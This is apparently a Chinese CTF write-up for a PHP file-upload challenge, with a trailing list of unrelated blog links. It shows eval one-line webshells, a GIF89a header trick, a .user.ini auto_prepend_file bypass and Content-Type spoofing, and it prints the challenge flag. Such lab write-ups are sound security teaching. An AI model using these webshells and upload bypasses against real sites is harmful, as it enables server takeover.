CTF之easyupload

拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php

那我们就用<?=eval($_POST['a']);?>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)

但是后缀依然不能绕过怎么办?

接下来就要学新知识了

.user.ini文件

auto_prepend_file可以让所有的php文件自动的包含某个文件。

例如在.user.ini文件中写入

auto_prepend_file=shell.jpg

然后在shell.jpg中写入一个一句话木嘛

<?php eval($_P0ST['aaa']); ?>

那么和.user.ini和shell.jpg同一目录下的所有php文件都会包含shell.jpg文件。

这里上传.user.ini文件

文件里写:auto_prepend_file=a.jpg

注意:要进行抓包将文件类型改成Content-Type: image/jpeg并且也要加GIF89a或者GIF87a

然后再上传一个对应的木马文件,并且后缀为图片类型

最后就是用蚁剑连接了注意连接地址是/uploads/index.php

cyberpeace{8e50e0951cae4b39f7c312da788c71bb}

相关推荐
Shartin40 分钟前
Can201-Introduction to Networking: Application Layer应用层
服务器·开发语言·php
乌云暮年2 小时前
Linux常用命令
linux·服务器·ssh·php
学习溢出3 小时前
【网络安全】理解安全事件的“三分法”流程:应对警报的第一道防线
网络·安全·web安全·网络安全·ids
安胜ANSCEN3 小时前
还在靠防火墙硬抗?网络安全需要从“单点防御“转向“系统化防护“!
网络安全·应急响应·威胁检测
apihz4 小时前
通用图片搜索-搜狗源免费API接口使用指南
android·java·python·php·音视频
博睿谷IT99_4 小时前
华为数据通信网络基础
开发语言·华为·php·华为认证
阿俊-全栈开发16 小时前
crmeb多门店对接拉卡拉支付小程序聚合收银台集成全流程详解
小程序·php·拉卡拉聚合收银台·拉卡拉三方支付
浩浩测试一下18 小时前
Windows 与 Linux 内核安全及 Metasploit/LinEnum 在渗透测试中的综合应用
linux·运维·windows·web安全·网络安全·系统安全·安全架构
周某人姓周1 天前
搭建渗透测试环境
网络安全·网络攻击模型
Jtti1 天前
如何准确查看服务器网络的利用率?
开发语言·php